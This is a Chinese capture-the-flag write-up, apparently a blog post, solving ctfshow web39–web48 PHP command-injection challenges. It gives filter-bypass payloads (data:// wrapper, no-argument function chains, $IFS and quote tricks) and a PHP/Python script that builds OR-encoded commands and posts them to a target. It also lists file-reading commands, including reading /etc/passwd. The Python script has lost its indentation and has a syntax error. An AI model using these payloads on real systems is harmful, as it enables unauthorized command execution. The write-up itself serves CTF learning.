web39
解答: 不能带有flag,可以用伪协议data://text/plain,
payload:data://text/plain,<?php system("cat f*");?>
页面是空白,要看源码。
使用data伪协议,执行了输入的php语句,因为.php 前面的php语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上。
web40
解答: 过滤了很多,但是下面是直接eval执行,可以直接函数执行,过滤了引号等内容,但是其中的括号过滤的是中文全角的(``),而非半角,所以还是可以使用括号的,那么可以考虑用无参数函数。
(上一篇的web31里提供了无参数函数的知识点链接)
?c=show_source(next(array_reverse(scandir(pos(localeconv())))));
题中还给了另一个解法,使用session:输入?c=session_start();system(session_id());
session_start() :启动新会话或者重用现有会话
session_id() :获取/设置当前会话 ID
修改PHPSESSID值即可。
web41
解答: 过滤了数字和字母,以及$、+、-、^、~使得异或自增和取反构造字符都无法使用,但是没有过滤或运算符|。
以下脚本来源:csdn博主yu22x
先php的生成一个rce_or.txt,内容是ascii为0-255对应字符如何通过或运算获取。(eg:?=%14|%3f)
#从进行异或的字符中排除掉被过滤的,然后在判断异或得到的字符是否为可见字符
<?php
$myfile = fopen("rce_or.txt", "w"); //打开要写入的文件
$contents="";
for ($i=0; $i < 256; $i++) { //ascii码256个字符
for ($j=0; $j <256 ; $j++) {
if($i<16){//ascii的前16个字符的十六进制应该是01,02,所以在前缀加‘0’
$hex_i='0'.dechex($i); //dechex(十进制转换成十六进制)
}
else{
$hex_i=dechex($i);
}
if($j<16){
$hex_j='0'.dechex($j);
}
else{
$hex_j=dechex($j);
}
$preg = '/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i'; //这里是可以根据题目修改的正则匹配条件
if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j))){//如果内容匹配上了就输出为空
echo "";
}
else{//对其加上%,转换成url编码
$a='%'.$hex_i;
$b='%'.$hex_j;
$c=(urldecode($a)|urldecode($b));//对两者进行异或
if (ord($c)>=32&ord($c)<=126) {//将异或的结果是可见字符的存入contents中
$contents=$contents.$c." ".$a." ".$b."\n";
}
}
}
}
fwrite($myfile,$contents);
fclose($myfile);?>
python脚本:命令行输入,python 文件名.py url地址
import requests
import urllib
from sys import *
#os.system("php or_getfun.php") #没有将php写入环境变量的需手动运行
if(len(argv)!=2)#未传够2个参数的,会给提示
print("="*50)
print('USER:python exp.py http://65d9abec-9d41-453d-b48d-bf60ef9fe78c.chall.ctf.show/')
print("="*50)
exit(0)
url=argv[1]
def action(arg):
s1=""
s2=""
for i in arg:
f=open("rce_or.txt","r")
while True:
t=f.readline()#逐行读取文件
if t=="":#读到空,即读完跳出循环
break
if t[0]==i:
#print(i)
s1+=t[2:5]#提取第一个字符串,具体可以看上面我的截图,如第一行的%00
s2+=t[6:9]#提取第二个字符串
break
f.close()
output="(\""+s1+"\"|\""+s2+"\")"
return(output)
while True:
param=action(input("\n[+] your function:") )+action(input("[+] your command:"))
data={
'c':urllib.parse.unquote(param)
}
r=requests.post(url,data=data)#post传递,若是get就get传递
print("\n[*] result:\n"+r.text)
web42
解答: 通过换行符,把后面移动到下面。?c=cat flag.php%0a
web43
解答: ?c=nl flag.php%0a
还是和上面的一样的代码,只是过滤cat和分号,那么换其他的读取命令即可。其实也可以使用反斜杠\绕过,因为它过滤的是连续字符串cat。
nl:将指定的文件添加行号标注后写到标准输出。
web44
解答: 过滤了flag,使用通配符*绕过。?c=nl fl*%0a
web45
解答: 增加的空格过滤,绕过即可。具体的绕过的一些方法在上一篇的web31写了,就不再多写。?c=nl$IFS$1fl*%0a
或者:
echo$IFS`tac$IFS*`%0A
web46
解答:过滤了*没有办法通配符绕过,那么字符绕过还可以使用单引号(成对)、双引号(成对)、反斜杠和斜杠、$@、可变扩展(?)。
反斜杠绕过:/?c=ca\t<>fla\g.php%0a
或者 nl<fla''g.php||,使用的是成对的单引号,||是利用连接符解决后面的>/del/null 2>&1。
连接符:
; 前面的执行完执行后面的 ping 127.0.0.1;whoami
| 管道符,显示后面的执行结果 ping 127.0.0.1|whoami
|| 当前面的执行出错时执行后面的 ping 1||whoami
& 前面的语句为假则直接执行后面的,前面可真可假 ping 127.0.0.1&whoami
&& 前面的语句为假则直接出错,后面的也不执行,前面只能为真 ping
web47
解答: 只是增加了几个读取命令的过滤,因此上题payload可以继续用。
web48
解答:上题payload继续用
在这里可以把代码后续的这几个命令简单介绍一下。
more、less、head、tail经常被用来在cat被过滤时绕过使用。
linux指令手册
more:分页显示指定的文本文件内容,从前向后浏览文件内容。
less:用于分页显示文件内容。不仅能从前向后,还可以从后向前浏览文件内容。
head:显示文件开头的内容,默认为前10行。
sort:对文件内容进行排序
tail:查看文件尾部内容,默认为后10行。
sed:利用语法/脚本对文本文件进行批量的编辑操作
cut:用于按列提取文件内容(如以冒号为间隔符,仅提取指定文件中第一列的内容:cut -d : -f 1 /etc/passwd)
awk:对文本和数据进行处理的编程语言
strings:在对象文件或二进制文件中查找可打印的字符串。(常用于查找文件中的flag:strings 文件名|grep "flag")
od:读取所给予的文件的内容,并将其内容以八进制字码呈现出来。
curl:在Shell终端界面中基于URL规则进行的文件传输工作,可以利用此命令实现反弹shell。
128
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
